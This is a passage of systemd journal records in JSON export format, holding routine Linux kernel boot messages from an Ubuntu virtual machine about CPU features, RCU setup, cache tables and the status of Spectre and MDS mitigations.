"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=79;b=e2b08827b5804427b422c10c84f1567e;m=558682;t=5bd16dd1905ea;x=dc4b1bb083f70bbb", "__REALTIME_TIMESTAMP" : "1615280779888106", "__MONOTONIC_TIMESTAMP" : "5604994", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Kernel/User page tables isolation: enabled" } { 
"__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7a;b=e2b08827b5804427b422c10c84f1567e;m=55868c;t=5bd16dd1905f3;x=ebb66b6d607ac266", "__REALTIME_TIMESTAMP" : "1615280779888115", "__MONOTONIC_TIMESTAMP" : "5605004", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ftrace: allocating 39306 entries in 154 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7b;b=e2b08827b5804427b422c10c84f1567e;m=558695;t=5bd16dd1905fd;x=25b7cc341a5cb139", "__REALTIME_TIMESTAMP" : "1615280779888125", "__MONOTONIC_TIMESTAMP" : "5605013", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "Hierarchical RCU implementation." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7c;b=e2b08827b5804427b422c10c84f1567e;m=5586a0;t=5bd16dd190607;x=a8784248f36b171c", "__REALTIME_TIMESTAMP" : "1615280779888135", "__MONOTONIC_TIMESTAMP" : "5605024", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "\u0009RCU restricting CPUs from NR_CPUS=8192 to nr_cpu_ids=1." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7d;b=e2b08827b5804427b422c10c84f1567e;m=5586a9;t=5bd16dd190611;x=17cad42f92f96745", "__REALTIME_TIMESTAMP" : "1615280779888145", "__MONOTONIC_TIMESTAMP" : "5605033", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "\u0009Tasks RCU enabled." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7e;b=e2b08827b5804427b422c10c84f1567e;m=5586b3;t=5bd16dd19061a;x=778621a60a8168", "__REALTIME_TIMESTAMP" : "1615280779888154", "__MONOTONIC_TIMESTAMP" : "5605043", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "RCU: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7f;b=e2b08827b5804427b422c10c84f1567e;m=5586bc;t=5bd16dd190623;x=b92fdbd20060c1c5", "__REALTIME_TIMESTAMP" : "1615280779888163", "__MONOTONIC_TIMESTAMP" : "5605052", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "NR_IRQS: 524544, nr_irqs: 256, preallocated irqs: 16" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=80;b=e2b08827b5804427b422c10c84f1567e;m=5586c5;t=5bd16dd19062c;x=b490850fd15c6fe2", "__REALTIME_TIMESTAMP" : "1615280779888172", "__MONOTONIC_TIMESTAMP" : "5605061", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", 
"_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "Console: colour VGA+ 80x25" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=81;b=e2b08827b5804427b422c10c84f1567e;m=5586dd;t=5bd16dd190644;x=90cdd9c6a302efe4", "__REALTIME_TIMESTAMP" : "1615280779888196", "__MONOTONIC_TIMESTAMP" : "5605085", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "console [tty1] enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=82;b=e2b08827b5804427b422c10c84f1567e;m=5586e6;t=5bd16dd19064d;x=710e7e5bf1ae139d", "__REALTIME_TIMESTAMP" : "1615280779888205", "__MONOTONIC_TIMESTAMP" : "5605094", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "console [ttyS0] enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=83;b=e2b08827b5804427b422c10c84f1567e;m=5586f1;t=5bd16dd190659;x=b0d667d63ba34732", "__REALTIME_TIMESTAMP" : "1615280779888217", "__MONOTONIC_TIMESTAMP" : "5605105", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "ACPI: Core revision 20170831" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=84;b=e2b08827b5804427b422c10c84f1567e;m=5586fa;t=5bd16dd190662;x=92661cfbe6db2a18", "__REALTIME_TIMESTAMP" : "1615280779888226", "__MONOTONIC_TIMESTAMP" : "5605114", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "ACPI: 1 ACPI AML tables successfully acquired and loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=85;b=e2b08827b5804427b422c10c84f1567e;m=558703;t=5bd16dd19066a;x=d6d886985107b215", "__REALTIME_TIMESTAMP" : "1615280779888234", "__MONOTONIC_TIMESTAMP" : "5605123", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4012", "MESSAGE" : "APIC: Switch to symmetric I/O mode setup" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=86;b=e2b08827b5804427b422c10c84f1567e;m=55870c;t=5bd16dd190673;x=a1961cb49536ff59", "__REALTIME_TIMESTAMP" : "1615280779888243", "__MONOTONIC_TIMESTAMP" : "5605132", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "6594", "MESSAGE" : "x2apic enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=87;b=e2b08827b5804427b422c10c84f1567e;m=558715;t=5bd16dd19067d;x=4c6f848de3d9c0ee", "__REALTIME_TIMESTAMP" : "1615280779888253", "__MONOTONIC_TIMESTAMP" : "5605141", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "8004", "MESSAGE" : "Switched APIC routing to physical x2apic." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=88;b=e2b08827b5804427b422c10c84f1567e;m=55871f;t=5bd16dd190686;x=f1b82f3ef3a09e2b", "__REALTIME_TIMESTAMP" : "1615280779888262", "__MONOTONIC_TIMESTAMP" : "5605151", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "12682", "MESSAGE" : "..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=89;b=e2b08827b5804427b422c10c84f1567e;m=558728;t=5bd16dd19068f;x=7bc3ec2567970a35", "__REALTIME_TIMESTAMP" : "1615280779888271", "__MONOTONIC_TIMESTAMP" : "5605160", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "15744", "MESSAGE" : "tsc: Detected 2099.990 MHz processor" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8a;b=e2b08827b5804427b422c10c84f1567e;m=558734;t=5bd16dd19069c;x=e94f89dba5e05079", "__REALTIME_TIMESTAMP" : "1615280779888284", "__MONOTONIC_TIMESTAMP" : "5605172", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "16012", "MESSAGE" : "Calibrating delay loop (skipped) preset value.. 
4199.98 BogoMIPS (lpj=8399960)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8b;b=e2b08827b5804427b422c10c84f1567e;m=55873d;t=5bd16dd1906a5;x=adc6f086387cee55", "__REALTIME_TIMESTAMP" : "1615280779888293", "__MONOTONIC_TIMESTAMP" : "5605181", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "20003", "MESSAGE" : "pid_max: default: 32768 minimum: 301" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8c;b=e2b08827b5804427b422c10c84f1567e;m=558746;t=5bd16dd1906ae;x=141973390bbbd033", "__REALTIME_TIMESTAMP" : "1615280779888302", "__MONOTONIC_TIMESTAMP" : "5605190", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "24037", "MESSAGE" : "Security Framework initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8d;b=e2b08827b5804427b422c10c84f1567e;m=558752;t=5bd16dd1906b9;x=f69cac992562d9c6", "__REALTIME_TIMESTAMP" : "1615280779888313", "__MONOTONIC_TIMESTAMP" : "5605202", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "26234", "MESSAGE" : "Yama: becoming mindful." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8e;b=e2b08827b5804427b422c10c84f1567e;m=55875b;t=5bd16dd1906c3;x=a5e24fb83560b6c7", "__REALTIME_TIMESTAMP" : "1615280779888323", "__MONOTONIC_TIMESTAMP" : "5605211", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "28043", "MESSAGE" : "AppArmor: AppArmor initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8f;b=e2b08827b5804427b422c10c84f1567e;m=558764;t=5bd16dd1906cc;x=6c308ef50c3a5d50", "__REALTIME_TIMESTAMP" : "1615280779888332", "__MONOTONIC_TIMESTAMP" : "5605220", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "32056", "MESSAGE" : "Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=90;b=e2b08827b5804427b422c10c84f1567e;m=55876e;t=5bd16dd1906d5;x=b89ec68ac8b48021", "__REALTIME_TIMESTAMP" : "1615280779888341", "__MONOTONIC_TIMESTAMP" : "5605230", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "36034", "MESSAGE" : "Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=91;b=e2b08827b5804427b422c10c84f1567e;m=558777;t=5bd16dd1906de;x=d5cbd363193285fd", "__REALTIME_TIMESTAMP" : "1615280779888350", "__MONOTONIC_TIMESTAMP" : "5605239", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", 
"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "39434", "MESSAGE" : "Mount-cache hash table entries: 4096 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=92;b=e2b08827b5804427b422c10c84f1567e;m=558780;t=5bd16dd1906e7;x=fa98366b38acd874", "__REALTIME_TIMESTAMP" : "1615280779888359", "__MONOTONIC_TIMESTAMP" : "5605248", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "40006", "MESSAGE" : "Mountpoint-cache hash table entries: 4096 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=93;b=e2b08827b5804427b422c10c84f1567e;m=558789;t=5bd16dd1906f0;x=3f1c170ea1e6bf54", "__REALTIME_TIMESTAMP" : "1615280779888368", "__MONOTONIC_TIMESTAMP" : "5605257", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "44336", "MESSAGE" : "Last level iTLB entries: 4KB 0, 2MB 0, 4MB 0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=94;b=e2b08827b5804427b422c10c84f1567e;m=558792;t=5bd16dd1906f9;x=cf6fcc04e36b3efb", "__REALTIME_TIMESTAMP" : "1615280779888377", "__MONOTONIC_TIMESTAMP" : "5605266", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "48003", "MESSAGE" : "Last level dTLB entries: 4KB 0, 2MB 0, 4MB 0, 1GB 0" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=95;b=e2b08827b5804427b422c10c84f1567e;m=55879b;t=5bd16dd190703;x=58189c75c4c81c80", "__REALTIME_TIMESTAMP" : "1615280779888387", "__MONOTONIC_TIMESTAMP" : "5605275", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "52004", "MESSAGE" : "Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=96;b=e2b08827b5804427b422c10c84f1567e;m=5587b5;t=5bd16dd19071d;x=ef7fdd149e9c0257", "__REALTIME_TIMESTAMP" : "1615280779888413", "__MONOTONIC_TIMESTAMP" : "5605301", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "56003", "MESSAGE" : "Spectre V2 : Mitigation: Full generic retpoline" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=97;b=e2b08827b5804427b422c10c84f1567e;m=5587e2;t=5bd16dd19074a;x=89029417d35b153e", "__REALTIME_TIMESTAMP" : "1615280779888458", "__MONOTONIC_TIMESTAMP" : "5605346", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "58337", "MESSAGE" : "Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=98;b=e2b08827b5804427b422c10c84f1567e;m=5587ed;t=5bd16dd190755;x=a1c31d80f87bf9a1", "__REALTIME_TIMESTAMP" : "1615280779888469", "__MONOTONIC_TIMESTAMP" : "5605357", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", 
"SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "60002", "MESSAGE" : "Spectre V2 : Enabling Restricted Speculation for firmware calls" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=99;b=e2b08827b5804427b422c10c84f1567e;m=5587f7;t=5bd16dd19075f;x=61abf76af5eb1488", "__REALTIME_TIMESTAMP" : "1615280779888479", "__MONOTONIC_TIMESTAMP" : "5605367", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "64013", "MESSAGE" : "Spectre V2 : mitigation: Enabling conditional Indirect Branch Prediction Barrier" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9a;b=e2b08827b5804427b422c10c84f1567e;m=558802;t=5bd16dd190769;x=c2b3c220b9500653", "__REALTIME_TIMESTAMP" : "1615280779888489", "__MONOTONIC_TIMESTAMP" : "5605378", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "68003", "MESSAGE" : "Speculative Store Bypass: Mitigation: Speculative Store Bypass disabled via prctl and seccomp" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9b;b=e2b08827b5804427b422c10c84f1567e;m=55880c;t=5bd16dd190773;x=4a3a4241b62f64d7", "__REALTIME_TIMESTAMP" : "1615280779888499", "__MONOTONIC_TIMESTAMP" : "5605388", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "72048", "MESSAGE" : "MDS: Mitigation: Clear CPU buffers" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9c;b=e2b08827b5804427b422c10c84f1567e;m=558816;t=5bd16dd19077d;x=ca6658fda5d13a1f", "__REALTIME_TIMESTAMP" : "1615280779888509", "__MONOTONIC_TIMESTAMP" : "5605398", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "91684", "MESSAGE" : "Freeing SMP alternatives memory: 36K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9d;b=e2b08827b5804427b422c10c84f1567e;m=558831;t=5bd16dd190798;x=b8166bd5baf8d6d1", "__REALTIME_TIMESTAMP" : "1615280779888536", "__MONOTONIC_TIMESTAMP" : "5605425", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "96553", "MESSAGE" : "TSC deadline timer enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9e;b=e2b08827b5804427b422c10c84f1567e;m=55883c;t=5bd16dd1907a3;x=5cb1c588c308ecba", "__REALTIME_TIMESTAMP" : "1615280779888547", "__MONOTONIC_TIMESTAMP" : "5605436", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "96556", "MESSAGE" : "smpboot: CPU0: Intel Core Processor (Skylake, IBRS) (family: 0x6, model: 0x5e, stepping: 0x3)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9f;b=e2b08827b5804427b422c10c84f1567e;m=55884c;t=5bd16dd1907b4;x=1ac20c1cab97e364", "__REALTIME_TIMESTAMP" : "1615280779888564", "__MONOTONIC_TIMESTAMP" : "5605452", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", 
"_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "100099", "MESSAGE" : "Performance Events: unsupported p6 CPU model 94 no PMU driver, software events only." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a0;b=e2b08827b5804427b422c10c84f1567e;m=558858;t=5bd16dd1907bf;x=e9d2385de9d67c19", "__REALTIME_TIMESTAMP" : "1615280779888575", "__MONOTONIC_TIMESTAMP" : "5605464", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "104049", "MESSAGE" : "Hierarchical SRCU implementation." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a1;b=e2b08827b5804427b422c10c84f1567e;m=558863;t=5bd16dd1907ca;x=c20d97da25d55b95", "__REALTIME_TIMESTAMP" : "1615280779888586", "__MONOTONIC_TIMESTAMP" : "5605475", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", 